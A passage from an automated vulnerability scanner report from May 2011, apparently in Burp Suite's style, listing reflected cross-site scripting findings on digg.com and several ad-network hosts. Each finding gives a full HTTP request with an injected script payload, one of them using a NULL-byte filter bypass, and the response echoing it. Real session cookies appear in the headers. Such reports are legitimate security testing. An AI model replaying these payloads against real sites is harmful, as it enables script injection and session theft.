User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 10-May-2011 16:18:06 GMT; path=/; domain=digg.com
X-Digg-Time: D=509735 10.2.129.225
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17185

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/img/badges%00d7709"><script>alert(1)</script>46d514951b4/16x16-digg-guy.gif.rss">
...[SNIP]...

2.97. http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/img/badges/16x16-digg-guy.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f8d10"><script>alert(1)</script>8bcf737fa3a was submitted in the REST URL parameter 3. This input was echoed as f8d10"><script>alert(1)</script>8bcf737fa3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /img/badges/16x16-digg-guy.gif%00f8d10"><script>alert(1)</script>8bcf737fa3a HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 10-May-2011 16:18:21 GMT; path=/; domain=digg.com
X-Digg-Time: D=753650 10.2.129.226
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17185

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/img/badges/16x16-digg-guy.gif%00f8d10"><script>alert(1)</script>8bcf737fa3a.rss">
...[SNIP]...

2.98. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2874f'%3balert(1)//2006e84a4a3 was submitted in the redir parameter. This input was echoed as 2874f';alert(1)//2006e84a4a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=311&inv_code=cm.quadhearst&size=300x250&imp_id=cm-89745589_1304957835,11f8f328940989e&referrer=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadhearst%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-89745589_1304957835%2C11f8f328940989e%2Csports%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-cm.weath_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D154691%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.weath_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Dmm.ag1%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.am1%3Bbtg%3Dmm.aq1%3Bbtg%3Didgt.careers_l%3Bord%3D1304957833%3F2874f'%3balert(1)//2006e84a4a3 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYAiACKAIw4pSg7gQQ4pSg7gQYAQ..; anj=Kfw)(CZ#0s(F?MZLVSh`#>:`0`WW1(8g]RLPfbGhP:t/X(N=g3]%zH1@gU@%TxzFyMpF8#2ZS9N/Wuft/yR0tPsQ5U^geeVQTEc[7)3dU7eOC^p-u?:VGSah7Q=X?80Yp2LItDKo5KF@=(](`Ksb^3L>1?2KGL7SayTg7G.(0t$'jw_MJWRI3ScuGPZxluNNFnCCJPuqw.R(*S5Q.0VPjnm>@dEl:hrjd>IObXEMOWc10PCZ#:AC98<SRvJ?jr$PlNXO^z-r6%a_yk`*qBJI>blx8BQ>ZHi5[N!/Dz6)yJ<-?7cK+>z6/PCfI![Eg2zT$9.A#Rgu'*nw8yClo/.yZOhK).s<[8(GVLhu'f?x5NR3'O>QTvqi<N3s*p/AnG=wfH)En(q$8wH]sy<S.!O0UcLX0fdL.T(>D$`K9.LlOsosU38T(oFdkSzMu]lWh/[1h0)/K7xc$[fvmvGXvMdp?igeWn</VHw@P9lAaMY=jfA'BYkF0'H]Qkv.Ru%g619/*`K+^$euSVt(vOz1bR.jLdTK=9/ru/xg]rpX!eBc97)c77Z!hD:z*pBk.q5cEd#aAw`^ac2`!bX=%fnVKG$Msxef5K$qR03Qx>=#h%VZ$RW/WY[Tts%HHDk$yjpv0Q5ZEt>ghVfv79mwSjLafXH`Byo%!; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 16:18:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 16:18:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 16:18:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIp4ABEAoYASABKAEwy6eg7gQKEgiFugIQChgCIAIoAjDilKDuBBDLp6DuBBgC; path=/; expires=Sun, 07-Aug-2011 16:18:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb947609=5_[r^208WM#Y#k-E/qX3$<K9V?enc=AQAAQDMz8j-amZm5R2HwPwAAAKCZmfk_mpmZuUdh8D8AAABAMzPyP1rlFrYdxRksSsYda6b2ziXLE8hNAAAAAOQ8AwA3AQAAbQAAABQAAAA2fgUAv14AAAEAAABVU0QAVVNEACwB-gCqAQAAAgEBAgUCAAUAAAAALSCNigAAAAA.&tt_code=cm.quadhearst&custom_macro=BIMPD%5E3e0lVcYFVuL-raXoiSlMOi2_CzU2uLsbVL7L0rGB_LiR_gOXtBbYOqeXVl0Jqp67HwjIB-n8fbXVwb5QNFrnf46UbQqERKh-Z-NuByQaBp1Wo6NT1BflBUoMBPYNVFHSWgREmR3D4mrydDF6BlhDjGkO5D3JQi2qwe8mBDqgngKbmHkkBeGGi4qBEYpMR226f85VYLpIxkvUkE-BsQPJf0WfhPKoi3HzRW2_wuk1XH0dJMTfFduXbIYuf1cxd1nU7f2u2WAelPfui7mtZJnlYVcuCxLkjJSUc7tprvtfXww3ebHIHMGZk01WCf-qC9QUHTjASqxI4EZB0jnWjp61LQUTqewUXh9kTdO8c2M5lINE9T7mKAHw7fT3xBjZ0cn6skFNlsYVqTm8qwt8H2QyPh05C9fCJEncJvfytxWvvpK3tiHt2URNL9Zg7eHJtxaz2vx7DfBqd3RhJ3yRhLOkpHaoBUsWtsZZqH0CVvFPBCpr7b-Rq601L8LRLJk7h_RJiOFlo6C4ZVOQshWUNoNKKHtkDLXTscXLv-f2Xpy6gxsnElB2qxizr8oFrmD89HdP9ZabwBkGO4GCwpWPD-JbkcaLniHWpEyazQiCNYu4ZmM24rnkOX_vsOScquMH5FWEJmscK29OtwlM9JlyhzcanJE7LouAVCVLEuVYVQhW6ufaEE5_QIgb3SiyhgXjDWkkvfBz5xDsVEqchMpjM7fNhc84k6swQigovarhcmZ5u2rS_1nk3BZHnFkMBZbmbYVjqjjTwHFH25rMHyMpIOcu-Q%5EAHCID%5E1198380; path=/; expires=Tue, 10-May-2011 16:18:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 16:18:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZLVSh`#>:`0`WW1(8g]RLPfbGhP:t/X(N=g3]%zH1@gU@%TxzFyMpF8#2ZS9N/Wuft/yR0tPsQ5U^geeVQTEc[7)3dU7eOC^p-u?:VGSah7Q=X?80Yp2LItDKo5KF@=(](`Ksb^3L>1?2KGL7SayTg7G.(0t$'jw_MJWRI3ScuGPZxluNNFnCCJPuqw.R(*S5Q.0VPjnm>@dEl:hrjd>IObXEMOWc10PCZ#:AC98<SRvJ?jr$PlNXO^z-r6%a_yk`*qBJI>blx8BQ>ZHi5[N!/Dz6)yJ<-?7cK+>z6/PCfI![Eg2zT$9.A#Rgu'*nw8yClo/.yZOhK).s<[8(GVLhu'f?x5NR3'O>QTvqi<N3s*p/AnG=wfH)En(q$8wH]sy<S.!O0UcLX0fdL.T(>D$`K9.LlOsosU38T(oFdkSzMu]lWh/[1h0)/K7xc$[fvmvGXvMdp?igeWn</VHw@P9lAaMY=jfA'BYkF0'H]Qkv.Ru%g619/*`K+^$euSVt(vOz1bR.jLdTK=9/ru/xg]rpX!eBc97)c77Z!hD:z*pBk.q5cEd#aAw`^ac2`!bX=%fnVKG$Msxef5K$qR03Qx>=#h%VZ$RW/WY[Tts%HHDk$yjpv0Q5ZEt>ghVfv79mwSjLafXH`Byo%!; path=/; expires=Sun, 07-Aug-2011 16:18:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 16:18:19 GMT
Content-Length: 650

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadhearst/;net=cm;u=,cm-89745589_1304957835,11f8f328940989e,sports,ax.100-am.h-am.b-cm.ent_h-cm.music_h-cm.weath
...[SNIP]...
_h;btg=cm.music_h;btg=cm.weath_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=idgt.careers_l;ord=1304957833?2874f';alert(1)//2006e84a4a3">
...[SNIP]...

2.99. http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17113/tilt_640x480_equity.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc42"><script>alert(1)</script>aa0c2054941 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/17113/tilt_640x480_equity.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17113-117439-25710-6%3Fmpt%3D0.53933865390717984fc42"><script>alert(1)</script>aa0c2054941&mpt=0.5393386539071798&mpvc=http://xads.zedo.com/ads2/c%3Fa=919375%3Bn=1452%3Bx=3840%3Bc=1452000024,1452000024%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:17:55 GMT
Server: Apache
Last-Modified: Mon, 20 Dec 2010 16:32:58 GMT
ETag: "58df37-d37-497da12a04280"
Accept-Ranges: bytes
Content-Length: 7019
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://xads.zedo.com/ads2/c?a=919375;n=1452;x=3840;c=1452000024,1452000024;g=172;i=0;1=8;2=1;s=0;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=http://adfarm.mediaplex.com/ad/ck/17113-117439-25710-6?mpt=0.53933865390717984fc42"><script>alert(1)</script>aa0c2054941" TARGET="_blank">
...[SNIP]...

2.100. http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17113/tilt_640x480_equity.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97591"%3balert(1)//57aa88d57a2 was submitted in the mpck parameter. This input was echoed as 97591";alert(1)//57aa88d57a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17113/tilt_640x480_equity.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17113-117439-25710-6%3Fmpt%3D0.539338653907179897591"%3balert(1)//57aa88d57a2&mpt=0.5393386539071798&mpvc=http://xads.zedo.com/ads2/c%3Fa=919375%3Bn=1452%3Bx=3840%3Bc=1452000024,1452000024%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:17:58 GMT
Server: Apache
Last-Modified: Mon, 20 Dec 2010 16:32:58 GMT
ETag: "58df37-d37-497da12a04280"
Accept-Ranges: bytes
Content-Length: 6833
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://xads.zedo.com/ads2/c?a=919375;n=1452;x=3840;c=1452000024,1452000024;g=172;i=0;1=8;2=1;s=0;g=17
...[SNIP]...
=919375;n=1452;x=3840;c=1452000024,1452000024;g=172;i=0;1=8;2=1;s=0;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=http://adfarm.mediaplex.com/ad/ck/17113-117439-25710-6?mpt=0.539338653907179897591";alert(1)//57aa88d57a2\" target=\"_blank\">
...[SNIP]...

2.101. http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17113/tilt_640x480_equity.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1670f"%3balert(1)//f7649ea8090 was submitted in the mpvc parameter. This input was echoed as 1670f";alert(1)//f7649ea8090 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17113/tilt_640x480_equity.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17113-117439-25710-6%3Fmpt%3D0.5393386539071798&mpt=0.5393386539071798&mpvc=http://xads.zedo.com/ads2/c%3Fa=919375%3Bn=1452%3Bx=3840%3Bc=1452000024,1452000024%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk=1670f"%3balert(1)//f7649ea8090 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:02 GMT
Server: Apache
Last-Modified: Mon, 20 Dec 2010 16:32:58 GMT
ETag: "58df37-d37-497da12a04280"
Accept-Ranges: bytes
Content-Length: 6809
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://xads.zedo.com/ads2/c?a=919375;n=1452;x=3840;c=1452000024,1452000024;g=172;i=0;1=8;2=1;s=0;g=17
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://xads.zedo.com/ads2/c?a=919375;n=1452;x=3840;c=1452000024,1452000024;g=172;i=0;1=8;2=1;s=0;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=1670f";alert(1)//f7649ea8090http://adfarm.mediaplex.com%2Fad%2Fck%2F17113-117439-25710-6%3Fmpt%3D0.5393386539071798&clickTag=http://xads.zedo.com/ads2/c?a=919375;n=1452;x=3840;c=1452000024,1452000024;g=172;i=0;1=8;2=1;s=0;g=172;m
...[SNIP]...

2.102. http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17113/tilt_640x480_equity.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa49d"><script>alert(1)</script>4cfef1f8f2a was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/17113/tilt_640x480_equity.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F17113-117439-25710-6%3Fmpt%3D0.5393386539071798&mpt=0.5393386539071798&mpvc=http://xads.zedo.com/ads2/c%3Fa=919375%3Bn=1452%3Bx=3840%3Bc=1452000024,1452000024%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk=fa49d"><script>alert(1)</script>4cfef1f8f2a HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:00 GMT
Server: Apache
Last-Modified: Mon, 20 Dec 2010 16:32:58 GMT
ETag: "58df37-d37-497da12a04280"
Accept-Ranges: bytes
Content-Length: 7019
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://xads.zedo.com/ads2/c?a=919375;n=1452;x=3840;c=1452000024,1452000024;g=172;i=0;1=8;2=1;s=0;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=fa49d"><script>alert(1)</script>4cfef1f8f2ahttp://adfarm.mediaplex.com/ad/ck/17113-117439-25710-6?mpt=0.5393386539071798" TARGET="_blank">
...[SNIP]...

2.103. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6929e"-alert(1)-"015bce93dbd was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?tid=55445&type=mrect&clicktrack=http://ads.undertone.com/c?oaparams=2__bannerid=174883__campaignid=28335__zoneid=14739__UTLCA=1__ptm=1913__cb=e1f5c26e1c224759999ea3a6af27c9fa__bk=lkxrxc__id=bciwrb9g5enz8qa0fio0m3ke7__oadest=6929e"-alert(1)-"015bce93dbd HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064833_61548615?t=1304957839488&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304954974_24309:52570:1:0_24308:52572:1:2_29805:59534:2:5300_29807:59535:1:5305_29802:59536:1:594003; uid=1_1304954974_1303179323923:6792170478871670; kwd=1_1304954974_12936:259912_11317:1211706_11717:1211706_11718:1211706_11719:1211706; scg=1_1304954974; ppd=1_1304954974

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:18:42 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304957922_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 16:18:42 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 16:18:42 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 436

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=55445&type=mrect&clicktrack=http://ads.undertone.com/c?oaparams=2__bannerid=174883__campaignid=28335__zoneid=14739__UTLCA=1__ptm=1913__cb=e1f5c26e1c224759999ea3a6af27c9fa__bk=lkxrxc__id=bciwrb9g5enz8qa0fio0m3ke7__oadest=6929e"-alert(1)-"015bce93dbd' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

2.104. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
